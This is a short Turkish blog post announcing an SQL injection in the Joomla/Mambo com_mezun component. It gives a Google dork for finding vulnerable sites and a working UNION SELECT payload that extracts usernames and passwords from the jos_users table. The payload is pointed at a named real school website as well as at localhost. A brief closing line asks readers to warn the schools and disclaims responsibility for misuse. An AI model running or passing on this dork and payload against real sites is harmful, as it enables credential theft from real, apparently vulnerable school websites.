10 Aralık 2009 Perşembe

Joomla / Mambo com_mezun SQL injection

Exploiti bulan : ByEge

Exploit Google Dork : inurl:com_mezun


http://localhost/index.php?option=com_mezun&task=edit&hidemainmenu=ByEge&id= İnj..


http://www.edirneeml.k12.tr/index.php?option=com_mezun&task=edit&hidemainmenu=ByEge&id=-1 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from jos_users



Okul Siteleri Oldugu İçin Uyarı Veriniz Art Niyetli Kullanan Kişilere Hakkım Helal Deildir..

Hiç yorum yok :

Yorum Gönderme